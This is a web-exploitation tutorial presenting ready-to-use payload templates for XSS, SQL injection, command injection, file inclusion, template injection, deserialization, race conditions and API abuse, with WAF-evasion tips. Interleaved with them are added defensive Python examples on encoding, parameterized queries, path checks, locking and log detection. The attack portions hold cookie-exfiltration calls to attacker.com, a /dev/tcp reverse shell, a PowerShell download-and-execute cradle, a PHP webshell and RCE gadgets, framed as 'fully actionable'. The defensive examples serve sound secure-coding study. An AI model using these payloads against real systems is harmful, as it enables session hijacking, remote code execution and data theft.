Crafting Exploit Payloads

Crafting exploit payloads involves building precise inputs that manipulate a target application into performing unintended actions. These payloads take different forms depending on the vulnerability class, but the principle is the same: structure the input so it breaks the application’s expected logic, bypasses validation, and triggers malicious behavior.

Payload construction requires understanding:

  • the execution context

  • how the backend parses data

  • how characters and encodings behave

  • how filters and sanitizers work

  • how to evade WAF, IDS, and backend validation

  • how to chain multiple components into a final exploit

The goal is to generate payloads that work reliably across multiple requests and environments.

Understanding Payload Context

Before creating a payload, identify the context where the input lands:

  • HTML → DOM → XSS payloads

  • SQL query → SQL injection payloads

  • command shell → command injection payloads

  • file path → LFI/RFI payloads

  • JSON/XML parser → injection or deserialization payloads

  • backend logic → business logic exploitation payloads

Payloads must match their execution context.
A good payload is not universal; it’s context-specific.

Payload Foundation Structure

Every payload combines three parts:

  1. Entry point
    How it reaches the vulnerable code.

  2. Trigger
    The core malicious operation (e.g., <script>, ; ls, ' OR 1=1 --).

  3. Stabilizer/Evasion
    Adjustments for encoding, filter bypass, WAF evasion, or escaping.

All practical exploitation follows this structure.

Payload Crafting for Major Vulnerability Types

Below are practical, fully actionable templates with real-world examples.


XSS Payload Crafting

XSS payloads must match their HTML context:

Context 1: HTML Body Injection

</div><script>fetch('https://attacker.com?c='+document.cookie)</script>

Context 2: Attribute Injection

" autofocus onfocus=fetch('https://attacker.com?c='+document.cookie) x="

Context 3: JavaScript String Injection

');fetch('https://attacker.com?c='+document.cookie);// 

Context 4: Event Attribute (bypasses some tag-based filters)

<svg onload=alert(document.domain)>

Practical Filter Bypass Tricks

  • breaking out using "/>

  • encoded payloads: %3Cscript%3Ealert(1)%3C/script%3E

  • mixed-case tags: <ScRiPt>

  • using SVG, MathML, or unknown tags

  • injecting via JSON reflection
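The defender-side counterpart of "payloads must match their context" is that output encoding must match the context too. The example below is added here and is not code from the page: it takes the three context-specific payloads listed above as constructed sample input and renders each through the encoder for its context (HTML body, quoted attribute, JavaScript string), so the break-out characters become data instead of markup.

```python
"""Context-aware output encoding for the three XSS contexts above.
Added example (not from the page); inputs are constructed samples."""
import html
import json

# Constructed sample inputs: the page's three context payloads plus one
# that tries to close a <script> block from inside a JS string.
SAMPLE_INPUTS = {
    "body": "</div><script>fetch('https://attacker.com?c='+document.cookie)</script>",
    "attr": "\" autofocus onfocus=fetch('https://attacker.com?c='+document.cookie) x=\"",
    "js": "');fetch('https://attacker.com?c='+document.cookie);//",
    "js_close": "</script><script>alert(1)</script>",
}


def render_html_body(value: str) -> str:
    """Untrusted text between tags: escape <, >, &, and both quote kinds."""
    return f'<div class="msg">{html.escape(value, quote=True)}</div>'


def render_attribute(value: str) -> str:
    """Untrusted text inside an attribute: escape AND always quote the
    attribute, otherwise a space is enough to start a new attribute."""
    return f'<input value="{html.escape(value, quote=True)}">'


def encode_js_string(value: str) -> str:
    """Untrusted text inside a <script> string literal: JSON-encode it,
    then hex-escape <, > and & so the literal can never terminate the
    script block or introduce a tag. json.loads() of the result still
    yields the original value, so nothing is lost for the client."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_js_string(value: str) -> str:
    return f"<script>var msg = {encode_js_string(value)};</script>"


def render_all(inputs: dict) -> dict:
    """Render every sample in its matching context."""
    return {
        "body": render_html_body(inputs["body"]),
        "attr": render_attribute(inputs["attr"]),
        "js": render_js_string(inputs["js"]),
        "js_close": render_js_string(inputs["js_close"]),
    }
```

Note that the JavaScript context is not fixed by HTML-escaping: `&lt;` inside a `<script>` block is not decoded by the browser, so the value must be encoded as a JavaScript/JSON literal instead.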


SQL Injection Payload Crafting

SQL payloads depend on query structure.
Identify:

  • string-based queries

  • numeric-based queries

  • UNION queries

  • stacked queries (if supported)

  • time-based blind payloads

  • boolean-based blind payloads

Practical SQLi Payloads

1. Breaking out of string context

' OR '1'='1

2. Numeric context bypass

1 OR 1=1

3. Extracting data (UNION)

' UNION SELECT 1,2,@@version --

4. Time-based blind

' AND SLEEP(5) --

5. Boolean blind

' AND 1=1 --
' AND 1=2 --

6. WAF bypass techniques

  • inline comments: UN/**/ION

  • mixed casing: UnIoN

  • hex encoding: 0x414243

  • multiline concatenation
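To show why the string break-out payload works and what removes the whole class, here is an added example (not from the page) that runs a login query two ways against a constructed in-memory SQLite table: once assembled by string concatenation, once with bound parameters. The page's `' OR '1'='1` payload is used as the password value in both.

```python
"""String-built query beside the parameterized form, run on SQLite.
Added example (not from the page); the table contents are constructed."""
import sqlite3

# Constructed sample users; the third row is the one an attacker wants.
USERS = [("alice", "pw-alice", 0), ("bob", "pw-bob", 0), ("admin", "pw-admin", 1)]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(name TEXT, password TEXT, is_admin INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return con


def login_vulnerable(con: sqlite3.Connection, name: str, password: str) -> list:
    """The query text is built from the input, so a quote in the input
    ends the string literal and the rest is parsed as SQL:
    ... AND password = '' OR '1'='1'  -> true for every row."""
    sql = (f"SELECT name FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    return [row[0] for row in con.execute(sql)]


def login_parameterized(con: sqlite3.Connection, name: str, password: str) -> list:
    """Same query with placeholders: the driver sends the values
    separately from the statement, so they are never parsed as SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (name, password))]


def demo() -> tuple:
    """Returns (rows from the vulnerable query, rows from the safe query)
    for the page's break-out payload."""
    con = make_db()
    payload = "' OR '1'='1"
    return login_vulnerable(con, "nobody", payload), login_parameterized(con, "nobody", payload)
```

The vulnerable form returns every user because `AND` binds tighter than `OR`; the parameterized form returns no rows because the whole payload is compared literally against the password column.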


Command Injection Payload Crafting

Command injection targets OS commands.

Basic payloads

; id
&& whoami
| uname -a

File write attempts

; echo 'pwned' > /tmp/p

Reverse shell payload (Linux)

; bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Windows command payload

& powershell -NoP -Exec Bypass -C "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/p.ps1')"

Bypass techniques

  • whitespace alternatives: ${IFS}

  • using backticks: `id`

  • encoding with URL, Base64
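The separator and `${IFS}` tricks above only matter when a shell parses the value. The following added example (not from the page) shows a host-lookup wrapper built the vulnerable way (a command string for the shell) beside the fixed way (an argv list passed directly to the OS, plus an allowlist check). The hostname pattern and the `ping` command are assumptions for illustration.

```python
"""Shell-string command building beside argv-list execution with input
validation. Added example (not from the page)."""
import re
import subprocess

# Assumed allowlist for a hostname/IP parameter: letters, digits, dot, dash.
HOSTNAME_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")
# Characters a POSIX shell would treat as separators or substitutions.
SHELL_META = set(";&|`$(){}<>\n")


def build_shell_command(host: str) -> str:
    """The vulnerable pattern: the value is spliced into one string that
    a shell will later tokenize. Returned for inspection, never run here."""
    return f"ping -c 1 {host}"


def has_shell_metachars(value: str) -> bool:
    """Detection helper: flag values carrying shell-significant characters
    (covers '; id', '&& whoami', '`id`', '${IFS}')."""
    return any(ch in SHELL_META for ch in value)


def is_safe_host(host: str) -> bool:
    """Allowlist, not denylist: only characters a hostname may contain."""
    return HOSTNAME_RE.fullmatch(host) is not None


def build_argv(host: str) -> list:
    """Validate, then place the value in its own argv element. With
    shell=False (subprocess default) the list goes straight to execve(),
    so no shell ever sees a separator."""
    if not is_safe_host(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]


def echo_literal(value: str) -> str:
    """Demonstrates argv semantics offline: the whole value, separators
    included, arrives as one argument and is simply printed back."""
    proc = subprocess.run(["echo", value], capture_output=True, text=True, check=True)
    return proc.stdout
```

The argv form alone already neutralizes `; id` (it becomes part of the hostname argument), but the allowlist is still worth keeping: the invoked program may interpret option-like values (`-f`) or the value may be logged and reused elsewhere.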


File Inclusion Payload Crafting

LFI Payload Examples

../../../../etc/passwd

PHP Wrappers

php://filter/convert.base64-encode/resource=index.php

Log poisoning for RCE

Step 1: Inject PHP via User-Agent

<?php system($_GET['cmd']); ?>

Step 2: Load log file via LFI

/var/log/apache2/access.log

RFI Payload

http://attacker.com/shell.txt
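Traversal, wrapper, absolute-path and remote-URL values all fail the same way when the include parameter is resolved against a fixed base directory before use. This added example (not from the page) implements that check; the base directory and allowed extensions are assumptions, and the rejected inputs are the page's own LFI/RFI values.

```python
"""Resolve a user-supplied include name against a fixed base directory,
rejecting traversal, stream wrappers, absolute paths and null bytes.
Added example (not from the page); BASE_DIR is an assumed location."""
import re
from pathlib import Path

BASE_DIR = Path("/var/www/app/pages").resolve()          # assumed include root
ALLOWED_EXT = {".php", ".html"}                          # assumed allowlist
# Any scheme prefix: php://, http://, data://, expect:// ...
WRAPPER_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")


def resolve_include(user_value: str) -> Path:
    """Return the resolved path or raise ValueError with the reason."""
    if "\x00" in user_value:
        raise ValueError("null byte in path")
    if WRAPPER_RE.match(user_value):
        raise ValueError("stream wrapper or URL not allowed")
    # Joining then resolving collapses every ../ component; an absolute
    # user value replaces the base entirely, which the next check catches.
    candidate = (BASE_DIR / user_value).resolve()
    if not candidate.is_relative_to(BASE_DIR):        # Python 3.9+
        raise ValueError("path escapes the base directory")
    if candidate.suffix not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    return candidate


def reason_for(user_value: str) -> str:
    """'ok' or the rejection reason, for logging without including."""
    try:
        resolve_include(user_value)
        return "ok"
    except ValueError as exc:
        return str(exc)
```

The absolute-path case matters for the log-poisoning chain above: `/var/log/apache2/access.log` does not contain `../`, so a traversal-only filter would pass it, but it lies outside the base directory and has the wrong extension.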

SSTI Payload Crafting

Server-Side Template Injection relies on template syntax.

Common Payloads

Jinja2

{{ 7*7 }}
{{ ''.__class__.__mro__[1].__subclasses__()[407]('id',shell=True,stdout=-1).communicate() }}

Twig

{{_self.env.registerUndefinedFilterCallback('exec')}}{{'id'|exec}}

Velocity

#foreach($i in [1..10])${i*7}#end
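The common root of every SSTI payload above is that user input reaches the template source rather than the template's data. This added example (not from the page) shows the same distinction in plain Python using `str.format`, which also evaluates attribute access inside placeholders, so no template engine needs to be installed; the `Profile` class and the probe detector are illustrative assumptions.

```python
"""User input spliced into a template versus passed as data, shown with
str.format as a stand-in for a template engine. Added example
(not from the page)."""
import re


class Profile:
    """Constructed sample object handed to the template."""
    def __init__(self, name: str):
        self.name = name


def render_unsafe(user_greeting: str, profile: Profile) -> str:
    """The untrusted value becomes part of the template text, so any
    placeholder it contains is evaluated against the render context."""
    template = "Hello " + user_greeting + "!"
    return template.format(profile=profile)


def render_safe(user_greeting: str, profile: Profile) -> str:
    """The template is a fixed string written by the developer; the
    untrusted value is only ever substituted as data."""
    template = "Hello {greeting}!"
    return template.format(greeting=user_greeting)


# Arithmetic probes like {{7*7}}, ${7*7}, #{7*7}, {7*7} in a parameter.
PROBE_RE = re.compile(r"(\{\{|\$\{|#\{|\{)\s*\d+\s*[*+]\s*\d+\s*\}")


def looks_like_template_probe(value: str) -> bool:
    """Detection heuristic for the page's 7*7-style probes."""
    return PROBE_RE.search(value) is not None
```

In the unsafe form a value such as `{profile.__class__.__name__}` is evaluated and renders the class name; in the safe form the same text is printed back literally. Detection of probes is a useful alarm, but the fix is the second function, not the detector.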

Deserialization Payload Crafting

Payloads depend on the language.

PHP Example

O:4:"Test":1:{s:4:"cmd";s:2:"id";}

Use a class with __wakeup() or __destruct() to execute commands.

Python Pickle Payload

cos
system
(S'id')
tR.

Java Gadget Payload (Commons Collections)

Generate via ysoserial:

java -jar ysoserial.jar CommonsCollections6 "curl attacker.com" > payload.ser

WebSocket Payload Crafting

Send crafted JSON frames:

{"action":"setRole","role":"admin"}

Brute-force frames:

{"action":"verifyOTP","code":"000001"}

Race Condition Payload Crafting

Focus on sending identical high-impact requests concurrently:

Example:

POST /transfer
amount=100

Then fire 200 parallel requests.

Use Turbo Intruder or Python threading:

import threading

# hit(): sends one copy of the /transfer request (the tester's own function)
for i in range(200):
    threading.Thread(target=hit).start()
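The reason 200 identical requests can overdraw an account is a check-then-act window between reading the balance and debiting it. This added example (not from the page) reproduces that window in-process, no requests are sent, and shows the same withdrawal under a lock; the 1 ms sleep stands in for a database round trip and is an assumption.

```python
"""Check-then-debit race reproduced in-process, without and with a lock.
Added example (not from the page)."""
import threading
import time


class Account:
    def __init__(self, balance: int):
        self.balance = balance
        self.lock = threading.Lock()

    def withdraw_racy(self, amount: int) -> bool:
        # Check and debit are separate steps. While one thread sits in the
        # window, every other thread passes the check against the same
        # undebited balance.
        if self.balance >= amount:
            time.sleep(0.001)               # assumed window (e.g. a DB round trip)
            self.balance -= amount
            return True
        return False

    def withdraw_atomic(self, amount: int) -> bool:
        # Same steps under a lock. In a real service this is a row lock
        # (SELECT ... FOR UPDATE) or a conditional UPDATE ... WHERE balance >= ?
        with self.lock:
            return self.withdraw_racy(amount)


def simulate(atomic: bool, requests: int = 200, amount: int = 100) -> tuple:
    """Fire `requests` concurrent withdrawals of `amount` against a balance
    that covers exactly one. Returns (successful_withdrawals, final_balance)."""
    acct = Account(balance=amount)
    withdraw = acct.withdraw_atomic if atomic else acct.withdraw_racy
    barrier = threading.Barrier(requests)      # release all threads together
    results = []

    def hit():
        barrier.wait()
        results.append(withdraw(amount))

    threads = [threading.Thread(target=hit) for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), acct.balance
```

The racy run ends with many successful withdrawals and a negative balance; the locked run ends with exactly one success and a zero balance, which is the property a transfer endpoint must enforce at the data store, not in application memory.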

API Exploit Payload Crafting

Mass Assignment

{"role":"admin","balance":10000}

BOLA / IDOR

/users/1002/orders

JSON injection

{"isAdmin":true}
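Mass assignment, `isAdmin`/role tampering and the WebSocket `setRole` frame above are all the same defect: the server binds whatever fields the client sends. IDOR is its sibling: the server trusts the id in the path. This added example (not from the page) shows the two server-side checks that close them, an allowlist for self-service updates and an ownership check before returning a user's orders; the user records, order data and field allowlist are constructed for illustration.

```python
"""Allowlisted binding for profile updates and an object-level
authorization check for /users/{id}/orders. Added example (not from the
page); all records are constructed samples."""
import json
from dataclasses import dataclass


@dataclass
class User:
    id: int
    name: str
    email: str
    role: str = "user"
    balance: int = 0


USERS = {
    1001: User(1001, "alice", "alice@example.com"),
    1002: User(1002, "bob", "bob@example.com", balance=50),
    1: User(1, "root", "root@example.com", role="admin"),
}
ORDERS = {1001: ["order-A"], 1002: ["order-B", "order-C"]}

# Fields a user may change on their own record. role, balance, isAdmin
# and anything else in the body are reported and ignored.
SELF_WRITABLE = {"name", "email"}


def update_profile(actor_id: int, raw_body: str) -> dict:
    """Bind the JSON body to the caller's own record through the allowlist."""
    body = json.loads(raw_body)
    if not isinstance(body, dict):
        raise ValueError("JSON object expected")
    user = USERS[actor_id]
    applied = sorted(SELF_WRITABLE & set(body))
    rejected = sorted(set(body) - SELF_WRITABLE)
    for key in applied:
        setattr(user, key, str(body[key]))
    return {"applied": applied, "rejected": rejected}


def can_access(actor_id: int, path_user_id: int) -> bool:
    """Object-level authorization: the resource owner or an admin."""
    return path_user_id == actor_id or USERS[actor_id].role == "admin"


def get_orders(actor_id: int, path_user_id: int) -> list:
    """Handler for GET /users/{path_user_id}/orders on behalf of actor_id."""
    if not can_access(actor_id, path_user_id):
        raise PermissionError("not your resource")
    return ORDERS.get(path_user_id, [])
```

The actor id comes from the authenticated session, never from the body or path, and the `rejected` list is worth logging: a body carrying `role` or `balance` from an ordinary user is a clear tampering signal.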

WAF Evasion Techniques for Payloads

Attackers modify payloads to bypass filters:

  • case variations: SeLeCt

  • splitting operators: S||ELECT

  • comment injection: UN/**/ION

  • URL-encoded vectors: %2F%2E%2E%2F

  • UTF-7/UTF-16 encoding

  • using null bytes: %00

  • multi-stage payloads

A strong exploit payload must survive filtering.
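Every evasion trick listed above (URL and double encoding, mixed case, inline comments, `${IFS}`, null bytes) defeats a matcher that inspects the raw request. This added example (not from the page) normalizes each value before matching and runs a handful of signatures over constructed access-log lines that carry the page's own XSS, SQLi, command-injection, traversal and log-poisoning values; the log format and signature set are assumptions for illustration.

```python
"""Normalize-then-match detection over constructed access-log lines.
Added example (not from the page)."""
import re
from urllib.parse import unquote

# Constructed sample lines: client ip, request line, User-Agent.
SAMPLE_LOG = [
    '10.0.0.5 "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" "Mozilla/5.0"',
    '10.0.0.6 "GET /item?id=1%20UN/**/ION%20SeLeCt%201,2,@@version-- HTTP/1.1" "Mozilla/5.0"',
    '10.0.0.7 "GET /ping?host=8.8.8.8;${IFS}id HTTP/1.1" "curl/8.0"',
    '10.0.0.8 "GET /page?file=..%252F..%252Fetc%252Fpasswd%00.png HTTP/1.1" "Mozilla/5.0"',
    '10.0.0.9 "GET /index.php?page=about HTTP/1.1" "<?php system($_GET[\'cmd\']); ?>"',
    '10.0.0.10 "GET /search?q=red+shoes HTTP/1.1" "Mozilla/5.0"',
]

# Signatures are written against the normalized (decoded, lower-cased) form.
SIGNATURES = {
    "xss": re.compile(r"<\s*(script|svg|img|iframe)\b|on\w+\s*="),
    "sqli": re.compile(r"\b(union\s+select|or\s+'?1'?\s*=\s*'?1|sleep\s*\()"),
    "cmdi": re.compile(r"[;&|`]\s*(id|whoami|uname|bash|sh|powershell)\b"),
    "lfi": re.compile(r"(\.\./){2,}|php://|/etc/passwd"),
    "php-tag": re.compile(r"<\?php"),
}


def normalize(value: str) -> str:
    """Undo the transformations the evasion tricks rely on."""
    out, prev = value, None
    for _ in range(3):                      # repeated decode catches %25xx double encoding
        if out == prev:
            break
        prev, out = out, unquote(out)
    out = out.replace("+", " ")
    out = out.replace("\x00", "")           # %00 after decoding
    out = re.sub(r"/\*.*?\*/", "", out)     # inline comments: UN/**/ION -> UNION
    out = out.replace("${IFS}", " ")        # shell whitespace substitute
    out = re.sub(r"\s+", " ", out)
    return out.lower()                      # mixed case: SeLeCt -> select


def scan_line(line: str) -> list:
    """Names of the signatures that fire for one log line."""
    norm = normalize(line)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]


def scan_log(lines) -> dict:
    """Index -> matches for flagged lines; clean lines are omitted."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}
```

Decoding is bounded to three passes on purpose: an unbounded loop on attacker-controlled input is itself a resource-exhaustion risk, and three passes already cover the double-encoded traversal case. The User-Agent line is the one the log-poisoning chain depends on; it is caught by the `<?php` signature rather than by anything in the URL.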

Payload Stabilization Strategy

Payloads must adjust to how the server processes data:

  • use character encoding to evade filters

  • adjust quotes based on context (single, double, backticks)

  • escape characters only where needed

  • detect if backend strips or transforms characters

  • find where truncation occurs and craft short payloads

  • match backend’s parsing quirks

Payload Chain Attacks

Exploit chains combine multiple payloads:

XSS → Cookie Steal → Session Hijack

LFI → Log Poisoning → RCE

SQLi → File Write → Webshell

CSRF + Open Redirect → Account Takeover

WebSocket Auth Bypass → Privilege Escalation

Each chain uses multiple crafted payloads.

Intel Dump

  • Payloads depend on context: HTML, SQL, command shell, file paths, templates, JSON, or WebSockets.

  • A complete payload includes an entry point, trigger, and evasion/stabilizer.

  • XSS uses script and attribute injections.

  • SQLi uses OR-based, UNION, blind, and WAF-bypass payloads.

  • Command injection uses separators like ;, &&, and encoded payloads.

  • File inclusion payloads use traversal, wrappers, and log poisoning.

  • SSTI uses template syntax to escalate into RCE.

  • Deserialization payloads depend on language gadgets and unsafe magic methods.

  • API payloads exploit mass assignment and IDOR/role tampering.

  • WAF evasion includes encoding, mixed case, comments, and operator splitting.

  • Strong payloads adapt to backend parsing quirks and stabilize for reliable exploitation.
